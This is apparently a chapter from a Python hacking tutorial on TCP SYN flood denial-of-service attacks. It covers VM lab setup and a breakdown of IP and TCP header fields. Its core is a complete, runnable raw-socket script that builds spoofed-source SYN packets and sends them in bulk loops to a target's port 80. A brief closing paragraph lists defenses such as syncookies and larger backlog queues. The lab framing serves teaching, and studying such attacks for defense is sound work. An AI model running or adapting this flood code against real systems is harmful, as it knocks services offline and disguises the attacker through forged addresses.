21. DoS - TCP SYN Flood

21.1 The Basic Concept of the TCP SYN Flood

 Figure 21-1 TCP SYN Flood Basic Concept

TCP conducts communications after establishing a connection through a 3-way handshake. First, the client requests a connection setup by sending a SYN packet to the server, the server then responds by sending a SYN/ACK packet to the client. Finally, the client sends the ACK packet, and the connection is established. Here, there is a kind of security vulnerability in that the server allocates system resources when it receives a SYN packet. The sysem keeps a record of the connection requests in the backlog queue, and when this queue is full, it cannot receive any more requests. TCP SYN Flood attacks transmit a large number of SYN packets, making operation impossible due to flooding the backlog queue.

21.2 Linux Installation

For a TCP SYN Flood attack, use a “raw socket” that allows a user to change the TCP and IP header information arbitrarily. First, you need to call the “sendto” method for the raw socket. Windows prevents the “sendto” method from being invoked for the TCP protocol for security reasons because PCs frequently become zombies and are used for DoS attacks. Linux allows invoking the TCP protocol using the “sendto” method. Simply install Linux on Virtual box to test the TCP SYN Flood attack.

• Linux Download

Download Ubuntu Linux (12.04.4 LTS Pricise Pangolin) from the Ubuntu site (releases.ubuntu.com/precise). Python is installed by default. Since the 64-bit Linux version cause slowdowns in Virtualbox, it is preferable to select the 32-bit version. 

 Figure 21-2 Linux Download

• Virtualbox Virtual Machine Creation

Type the “Name” as “linux”. Select “Linux” and “Ubuntu (32-bit)” for each field.

 Figure 21-3 Virtual Machine Creation

• Select Installer

[Settings] - [Storage] - [Empty] - [click on the icon] – [Choose a virtual CD / DVD disk file], select the menu. Then select the Linux installation files that were downloaded.

 Figure 21-4 Select Installer

• Virtual Box Network Setting Confirmation

Make sure it is set to NAT in the [Settings] – [Network] tab. Typically, NAT has been set, if not, change the settings. If it is set to NAT, it is possible to have an Internet connection.

 Figure 21-5 Confirming Virtual Box Network Configuration

• Installing Linux

If you click on the Linux image on the left side, the installation begins. Click the [Install Ubuntu] button and enter the information according to the instructions. Then, it is possible to complete the installation easily. 

 Figure 21-6 Linux Install

• Enter the User Information

Enter the user information by entering the username and password as “linux”. 

 Figure 21-7 Entering User Information

• Changing the Virtual Box Network Settings

Select [internal network] for this test. This means that a connection is established between the virtual PCs.

 Figure 21-8 Virtual Box Network Setting

• Changing the Linux Network Setting

Open the “/etc/network/interfaces” file and change it in the following manner. After checking the IP by executing the “ipconfig” command in the hacker PC, bind the IP that is not used in the same band to “address”.

 Figure 21-9 Linux Network Setting

• Setting Linux hosts

Open the “/etc/network/interfaces” file and change it in the following manner. Check the IP address for the server PC and place it here.

 Figure 21-10 Linux hosts File Setting

• Confirming the Linux Installation

When the installation is complete, press the “Ctrl + Alt + t” key combination to open the terminal. In order to run with root privileges, you can set the initial password by typing “sudo passwd root”. I set the password to be the same as the username as “root”. Now log in as root using the “su –”  command. In Ubuntu version 12.04, Python 2.7.3 is installed by default.

 Figure 21-11 Login as root

21.3 IP and TCP Headers Setting

In typical socket communication, the kernel automatically specifies the IP and TCP settings. However, in order to transfer only the SYN packet using the raw socket, a programmer must manually generate the header. To use C language functions in Python, the header should have the same shape as that used in C. First, let’s look at the structure of the IP header as follows.

 Figure 21-12 IP Header

The IP header is composed of a total of 20 bytes from “Version” to “Destination Address”. The version is 4, which indicates IPv4 is being used. “IHL” indicates the length of the full header, where 32-bits unit is entered. When you insert 5, this means 20 bytes. “Identification” incorporates an arbitrary value. The “Flags” and “Fragment Offset” values are set to 0 at the same time. “Time to Live” is set to the maximum value of 255 supported by the network. “Protocol” is set to the “socket.IPPROTO_TCP”. The kernel will set the “Total Length” and the “Header Checksum” for the packet transmission time.

 Figure 21-13 IP Header File

Now let's set the TCP header. The IP settings specify the address and the TCP settings specify the port that is used for communication. The type of TCP packets are set using the “Flags” value, and the SYN Flood attack is conducted such that only the SYN packet is sent in bulk, SYN is set to 1, and the rest is specified as 0.

 Figure 21-14 TCP Header

“Source Port” is set to a random value, and “Destination Port” is set to the target port 80. “Sequence Number” and “Acknowledgment Number” are set to any value. “DataOffset” indicates the locations where the header ends. Since it is used with 32-bit units, a setting of “5” indicates that the header has a length of 20 bytes. The value for the “Flag” is set to the “SYN” item of only 1. “Window” is set to 5840, which is the maximum size allowed by the protocol. “Checksum” is set automatically by the kernel after packet transmission.

 Figure 21-15 TCP Header File

To set the IP header and the TCP header, the characters used in the Python should be converted to a C language structure. Python uses the “pack” function provided by the “struct” module and can easily implement the conversion. The following format characters can be used to specify the Python types as the appropriate C language type.

 Figure 21-16 Format Characters

21.4 TCP SYN Flood Example

The python socket module provides a variety of functions. The most basic functions involve transmiting data after the connection has been established. In the TCP protocol, the data will be trasmitted after a 3-way handshake has been completed. For the “TCP SYN Flood” attack, the data has to be sent before the communication connection has been established. Therefore, it is necessary to use other types of functions. 

‘’’ Code Reference From          http://www.binarytides.com/python-syn-flood-program-raw-sockets-linux/          http://www.binarytides.com/python-packet-sniffer-code-linux/ ‘’’ import socket, sys from struct import * def makeChecksum(msg):                                        #(1)     s = 0     for i in range(0, len(msg), 2):         w = (ord(msg[i]) << 8) + (ord(msg[i+1]) )         s = s + w     s = (s>>16) + (s & 0xffff);     s = ~s & 0xffff     return s def makeIPHeader(sourceIP, destIP):                            #(2)     version = 4     ihl = 5     typeOfService = 0     totalLength = 20+20                                              id = 999                    flagsOffSet = 0     ttl =  255                   protocol = socket.IPPROTO_TCP                                 headerChecksum = 0                 sourceAddress = socket.inet_aton ( sourceIP )     destinationAddress = socket.inet_aton ( destIP )     ihlVersion = (version << 4) + ihl     return pack('!BBHHHBBH4s4s' , ihlVersion, typeOfService, totalLength, id, flagsOffSet, ttl, protocol, headerChecksum, sourceAddress, destinationAddress) #(3) def makeTCPHeader(port, icheckSum="none"):                     #(4)     sourcePort = port                                                destinationAddressPort = 80                                     SeqNumber = 0     AckNumber = 0     dataOffset = 5                                                    flagFin = 0     flagSyn = 1                                                       flagRst = 0     flagPsh = 0     flagAck = 0     flagUrg = 0     window = socket.htons (5840)       if(icheckSum == "none"):         checksum = 0     else:         checksum = icheckSum     urgentPointer = 0     dataOffsetResv = (dataOffset << 4) + 0     flags = (flagUrg << 5)+ (flagAck << 4) + (flagPsh <<3)+ (flagRst << 2) + (flagSyn << 1) + flagFin     return pack('!HHLLBBHHH', sourcePort, destinationAddressPort, SeqNumber, AckNumber, dataOffsetResv,  flags,  window, checksum, urgentPointer)      #(5) s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)    #(6) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)                    #(7) for j in range(1,20):                                                  #(8)         for k in range(1,255):                 for l in range(1,255):                         sourceIP = "169.254.%s.%s"%(k,l)                   #(9)                         destIP = "169.254.27.229"                           ipHeader  = makeIPHeader(sourceIP, destIP)          #(10)                         tcpHeader = makeTCPHeader(10000+j+k+l)             #(11)                         sourceAddr = socket.inet_aton( sourceIP )           #(12)                         destAddr = socket.inet_aton(destIP)                         placeholder = 0                         protocol = socket.IPPROTO_TCP                         tcpLen = len(tcpHeader)                         psh = pack('!4s4sBBH', sourceAddr, destAddr, placeholder, protocol, tcpLen);                         psh = psh + tcpHeader;                         tcpChecksum = makeChecksum(psh)                    #(13)                         tcpHeader = makeTCPHeader(10000+j+k+l,tcpChecksum)  #(14)                         packet = ipHeader + tcpHeader                                                               s.sendto(packet, (destIP , 0 ))                    #(15)

Example 21-1 TCP SYN Flood

The results of executing the program can be seen in the Wireshark program that is installed in the hacker PC and with the “netstat -n -p tcp” command in the command prompt on Windows in the server PC. Here we see the results in the command prompt on Windows. The results for the program are as follows.

(1)  Declaring TCP Checksum Calculation Function: Calculate the TCP checksum that is used to protect the integrity of the transmitted data. Divide the header and the data in 16-bit units, plus the respective bit. This can then be calculated by taking the complement thereof.

(2) Declaring IP Header Generating Function: Generates the IP Header, as was previously described.

(3) Creating IP Header Structure: Use the “pack” function to convert the format of the structure used in the C language.

(4) Declaring TCP Header Generating Function: Generates the TCP Header, as previously described.

(5) Creating TCP Header Structure: Use the “pack” function to convert the format of the structure used in the C language.

(6) Creating a raw socket: Create a socket object that supports the functionality that can arbitrarily generate an IP header and a TCP region. The use of the raw socket requires administrator privileges.

(7) Setting the Socket Option: Adjust the socket options to allow developers to generate an IP Header.

(8) Loop: Use a loop to send a large number of SYN packets.

(9) IP Setting: Specify the sender IP and the recipient IP. For convinience during the test, change the sender IP every time. The recipient IP can be set in the same way as “socket.gethostbyname (‘server’)”.

(10) Creating the IP Header: This function is called to create an IP header and return it using the C language structure.

(11) Creating the TCP Header: Call the TCP header generation function. At first, create a pseudo TCP header to obtain the TCP checksum. For the port number, use more than 10000. 10000 or more ports can be used without separate settings.

(12) IP Structure Transformation: Convert the string data to the “in_addr” structure using the “inet_aton” function.

(13) TCP checksum Calculation: Call the function to calculate the TCP checksum.

(14) IP Header Generation: Set TCP checksum to generate the actual TCP.

(15) Packet Transmission: By setting the IP header and the TCP header, send a TCP SYN packet. The “sendto” method supports the ability to unilaterally transfer a packet from a sender before the connection setting has been completed.

Run the sample, if you enter the “netstat -n -p tcp” in the command prompt in Windows for the server PC, it is possible to obtain the following results. The rightmost part “SYN_RECEIVED” is a portion that indicates the connection state of the packet in a state receiving the current SYN packet before the ACK/SYN packet is transmitted from the server. The connection is created by the thousands under the following conditions, consuming system resources to store the system state over a certain period of time. When a large amount of SYN packets are sent, the performance of the service is degraded or the system is run out of service.

Figure 21-17 TCP Header File

With the TCP SYN Flood attack, the system falls into denial of service when the backlog queue is full. Thus, an increase in the capacity of the backlog queue can be a defense against such an attack. Another method involves using “syncookies” to assign system resources after the 3-way handshake has been completed. It is possible to block the attacks from the router or firewall using an intercept mode and a watcher mode. In the interceptor mode, the router receives the SYN packet from the client. After the connection with the client has been extablished, the router makes a connection between the client and the server. In the watcher mode, the router monitors the state of the connection, and if the connection has not been established for a predetermined amount of time, it terminates the connection.